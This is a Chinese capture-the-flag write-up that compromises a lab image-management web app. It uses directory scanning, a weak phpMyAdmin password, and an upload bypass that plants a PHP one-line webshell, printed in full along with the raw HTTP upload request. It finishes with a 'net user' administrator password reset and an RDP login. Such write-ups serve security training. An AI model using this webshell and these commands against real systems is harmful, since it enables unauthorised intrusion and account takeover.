文章目录
-
- 综合题 机智图片管理系统
- 题目
- 解题WP
-
- 获取数据库管理后台
- 获取shell
- 获取管理员,远程桌面
- 摘抄
综合题 机智图片管理系统
题目
问题1:请扫描目标主机(IP地址请查看拓补图)开放的端口,key6就在【rebots.txt】中
问题2:key7存储在网站根目录下载的【key.php】文件中
问题3:请登录到远程计算机,key8将会在桌面上显示
解题WP
获取数据库管理后台
第一步 通过扫描目录,发现phpmyadmin的后台
python dirsearch.py -u http://192.168.253.208/ 扫描后台,发现phpmyadmin,robots.txt
第二步 通过弱口令 成功进入数据库后台
http://192.168.253.208/phpmyadmin
第三步 通过管理查看后台数据库,获取key
获取shell
第一步 通过更改数据库的md5值,获取后台的账号
21232f297a57a5a743894a0e4a801fc3 admin
第二步 进入后台,发现文件上传点
通过更改后缀名,成功上传,
<?php @assert($_REQUEST['123']); ?>
POST /tupian/article_insert.php HTTP/1.1 Host: 192.168.253.208 Content-Length: 527 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.253.208 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW8dVAGAJ9u0Xzh4r User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.253.208/tupian/article_add.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=tl3claduscvphiv60h4b3iolj4 Connection: close ------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r Content-Disposition: form-data; name="pic_channel" 1 ------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r Content-Disposition: form-data; name="pic_name" 123456qwer ------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r Content-Disposition: form-data; name="file[]"; filename="123.php" Content-Type: image/jpeg <?php @assert($_REQUEST['123']); ?> ------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r Content-Disposition: form-data; name="submit" 添加上传 ------WebKitFormBoundaryW8dVAGAJ9u0Xzh4r--
第三步 查看图片的地址
http://192.168.253.208/tupian/uploadfile/16659316799123.php
第四步 远程蚁剑连接,在网站根目录发现key
http://192.168.253.208/tupian/uploadfile/16659316799123.php 123
获取管理员,远程桌面
第一步 通过查看当前用户的权限,为管理员权限
whoami
第二步 更改管理员的密码
net user administartor QWE123456com!
注意,这得符合密码复杂度要求
第三步 进行远程连接桌面连接
mstsc
第四步 通过查看回收站,发现key
声明:本站所有资源,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。